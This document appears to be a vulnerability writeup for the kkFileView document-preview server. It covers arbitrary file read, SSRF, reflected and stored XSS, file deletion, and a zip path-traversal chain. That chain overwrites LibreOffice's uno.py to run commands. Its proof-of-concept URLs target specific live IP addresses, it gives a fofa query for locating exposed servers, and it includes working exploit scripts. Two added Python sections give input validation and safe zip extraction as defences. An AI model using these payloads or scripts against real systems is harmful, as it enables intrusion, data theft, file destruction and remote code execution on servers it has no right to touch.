
0x00 kkFileView arbitrary file read vulnerability

Vulnerability Description: Keking kkFileView is a Spring Boot based online document preview project from China. kkFileView has a directory traversal vulnerability that allows arbitrary files to be read, which can leak sensitive files on the affected host.

Vulnerability affects: kkFileView 3.6.0

fofa query body='kkFile:View'

Proof of vulnerability:

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd


0x01 kkFileView SSRF vulnerability

Vulnerability Description: kkFileView v4.1.0 has a server-side request forgery (SSRF) vulnerability. By injecting an arbitrary URL into the URL parameter, a remote attacker can force the application to issue a request to that URL.

Vulnerability affects: kkFileView v4.1.0

Proof of vulnerability:

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn


0x03 kkFileView XSS vulnerability

Vulnerability Description: kkFileView v4.1.0 has two XSS vulnerabilities that can lead to theft of the site's cookies.

Vulnerability affects: kkFileView v4.1.0

Vulnerability Proof: the payload is http://www.baidu.com/test.txt"><img src=111 onerror=alert(1)> (the tags were lost in the original rendering; this is the decoded form of the base64 below).

Base64 encoded:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==

URL encoded:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

PoC 1:

/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E


http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D


Payload <svg/onload=alert(1)>, base64 encoded:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

URL encoded:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

PoC 2:

/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

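The three issues above (the file:// read in 0x00, the SSRF in 0x01 and the reflected XSS in 0x03) share one root cause: a urlPath/url value is decoded and then fetched or echoed back without being validated as a remote http(s) URL. The following Python is an added example, not kkFileView's own code, of the server-side check a maintainer would put in front of that parameter. The function names (validate_url_path, decode_url_path, to_url_path), the allowed_hosts parameter and the example.com sample hosts are assumptions; it also goes beyond the page by rejecting literal internal IP addresses and supporting a host allowlist.

```python
# Added example (not kkFileView's own code): validate a urlPath/url style
# parameter before the server fetches or reflects it. Names are assumptions.
import base64
import ipaddress
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# RFC 3986 unreserved + reserved characters plus '%' for percent-encoding.
# Anything outside this set ('<', '>', '"', space, control characters) is not
# part of a valid URL and is exactly what the reflected-XSS payloads rely on.
URL_CHARS = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "-._~:/?#[]@!$&'()*+,;=%"
)


def to_url_path(url):
    """Encode a URL the way the v4.1.0 PoCs pass it: base64 of the raw URL."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def decode_url_path(raw):
    """Undo URL-encoding, then base64 if the value decodes cleanly; otherwise
    treat it as a plain URL (the v3.6.0 PoC sends file:///etc/passwd as-is)."""
    text = unquote(raw)
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return text


def validate_url_path(raw, allowed_hosts=None):
    """Return (True, url) for an acceptable remote http(s) URL, else (False, reason).

    Checks, in order: character set (blocks markup injection), scheme allowlist
    (blocks file:// reads), presence of a host, embedded credentials, literal
    non-public IP addresses, and an optional host allowlist (the real SSRF fix).
    """
    url = decode_url_path(raw)
    bad = [c for c in url if c not in URL_CHARS]
    if bad:
        return False, f"disallowed character {bad[0]!r} in URL"
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. a malformed IPv6 literal
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # a DNS name; its resolved address must be checked at connect time
    if ip is not None and not ip.is_global:
        return False, f"non-public address {ip}"
    if allowed_hosts is not None and parts.hostname not in allowed_hosts:
        return False, f"host {parts.hostname!r} not in allowlist"
    return True, url


if __name__ == "__main__":
    # constructed sample inputs, modelled on the PoCs in the writeup
    samples = [
        "file:///etc/passwd",
        "%3Cimg%20src=x%20onerror=alert(0)%3E",
        to_url_path('http://www.example.com/test.txt"><img src=111 onerror=alert(1)>'),
        to_url_path("http://127.0.0.1:8012/"),
        to_url_path("https://files.example.com/report.pdf"),
    ]
    for sample in samples:
        print(sample, "->", validate_url_path(sample))
```

A public DNS name such as the DNS-log domain used in the 0x01 PoC still passes the scheme check, which is why allowed_hosts, not the scheme filter, is the actual SSRF mitigation; hostnames also need to be resolved and re-checked at connect time, since a name can point at an internal address.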

0x04 kkFileView arbitrary file upload, leading to XSS and file inclusion vulnerabilities

Vulnerability Description: all versions of kkFileView have a file parsing vulnerability. Attackers can use it to create stored XSS, file inclusion or SSRF. By uploading arbitrary JavaScript to the server, a remote attacker can persistently make the application issue attack requests.

Vulnerability affects: kkFileView 4.1.0

Vulnerability Proof

1. Upload a file


2. Access the vulnerable location

http://139.9.101.60:8012/demo/2.html


3. File inclusion:

https://file.keking.cn/demo/test1.js

Access:

https://file.keking.cn/demo/test14.html

0x05 kkFileView arbitrary file deletion vulnerability

Vulnerability Description

kkFileView v4.0.0 has an arbitrary file deletion vulnerability, which allows any file on the system to be deleted.

Vulnerability Impact

kkFileView v4.0.0

Vulnerability Proof

/deleteFile?fileName=demo%2F.\xss.pdf

A GET request to this URI deletes xss.pdf in the \kkFileView-master\server\src\main\file directory (the file originally lived under the \kkFileView-master\server\src\main\file\demo directory).


0x06 kkFileView v4.3.0~v4.4.0-beta RCE vulnerability

Vulnerability impact: v4.2.1 and v4.2.0 are both affected; 4.1.0 is not affected.

Arbitrary file upload

    import zipfile

    if __name__ == '__main__':
        try:
            binary1 = b'1ueeeeeee'
            binary2 = b'hacked_by_1ue'
            zipFile = zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo('hack.zip')  # unused in the original script
            # a normal entry, so that the server creates the hack.zip_cache directory
            zipFile.writestr('test', binary1)
            # entry name padded with './' segments (see the note below)
            zipFile.writestr('././././././././././././././././././././././././tmp/flag', binary2)
            zipFile.close()
        except IOError as e:
            raise e

Build the malicious hack.zip. Note that the archive must also contain a normal file, such as test, so that the hack.zip_cache directory gets created.


Upload the file and preview it


The traversal succeeded

RCE

Any file can be uploaded, and the contents of existing files can be appended to.

After my research, I found that the target calls the system's LibreOffice when converting odt to pdf, and this process loads the uno.py file from the library, so the content of that py file can be overwritten.

    import zipfile

    if __name__ == '__main__':
        try:
            binary1 = b'1ue'
            binary2 = b'import os\r\nos.system(\'touch /tmp/hack_by_1ue\')'
            zipFile = zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo('hack.zip')  # unused in the original script
            # a normal entry, so that the hack.zip_cache directory gets created
            zipFile.writestr('test', binary1)
            # same './' padded entry name as before, now pointing at LibreOffice's uno.py
            zipFile.writestr('././././././././././././././././././././././././opt/libreoffice7.5/program/uno.py', binary2)
            zipFile.close()
        except IOError as e:
            raise e

Upload the malicious zip package and preview it


Then upload an odt file and preview it, which starts a LibreOffice conversion task


You can see that the command was executed successfully


The content was indeed written into uno.py
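Both 0x05 (the .\ segment in fileName) and 0x06 (zip entry names padded with ./ segments) come down to joining an attacker-controlled name onto a base directory without checking where the result lands. The Python below is an added example, not kkFileView's code: a strict path check, a zip extractor and scanner built on it, and a constructed sample archive to feed them. The names resolve_inside, unsafe_zip_entries, safe_extract, build_sample_zip and new_cache_dir are assumptions, as is the treatment of backslash as a path separator.

```python
# Added example (not kkFileView's own code): reject user-controlled paths
# (deleteFile's fileName, zip entry names) that leave the cache directory.
# Function names are assumptions for illustration.
import os
import tempfile
import zipfile


def resolve_inside(base_dir, user_path):
    """Return the absolute path of user_path under base_dir, or None to reject.

    Two independent checks: a strict segment check that refuses '.', '..',
    empty segments (leading, doubled or trailing slashes) and drive-letter
    colons, so names like 'demo/.\\xss.pdf' or '././tmp/flag' never reach the
    filesystem layer; then a realpath containment check as a second line of
    defence (it also follows symlinks that already exist under base_dir).
    """
    candidate = user_path.replace("\\", "/")  # assumption: backslash is a separator
    segments = candidate.split("/")
    if any(seg in ("", ".", "..") or ":" in seg for seg in segments):
        return None
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, candidate))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def unsafe_zip_entries(zip_path, cache_dir):
    """Names of entries that a naive 'join and write' extractor would place
    outside cache_dir. Useful as an upload-time scan or a detection rule."""
    with zipfile.ZipFile(zip_path) as zf:
        return [name for name in zf.namelist()
                if resolve_inside(cache_dir, name) is None]


def safe_extract(zip_path, cache_dir):
    """Extract only entries whose resolved path stays inside cache_dir.
    Returns (extracted_paths, rejected_names)."""
    extracted, rejected = [], []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            target = resolve_inside(cache_dir, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(target)
    return extracted, rejected


def build_sample_zip():
    """Constructed fixture for the scanner: one benign entry plus two entry
    names shaped like the ones the writeup relies on. Contents are harmless."""
    fd, path = tempfile.mkstemp(suffix=".zip")
    os.close(fd)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docs/readme.txt", b"benign content")
        zf.writestr("../outside.txt", b"constructed sample")
        zf.writestr("./././escape.txt", b"constructed sample")
    return path


def new_cache_dir():
    """Fresh temporary directory standing in for <file>/hack.zip_cache."""
    return tempfile.mkdtemp(prefix="kkfile_cache_")


if __name__ == "__main__":
    sample = build_sample_zip()
    cache = new_cache_dir()
    print("flagged entries:", unsafe_zip_entries(sample, cache))
    print("extracted / rejected:", safe_extract(sample, cache))
    print("deleteFile name check:", resolve_inside(cache, "demo/.\\xss.pdf"))
```

The segment check is deliberately stricter than a plain realpath comparison: './././tmp/flag' normalises to a path inside the cache directory, so containment alone would accept it, while the dot segments themselves are what the writeup depends on and have no legitimate use in a cache file name.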
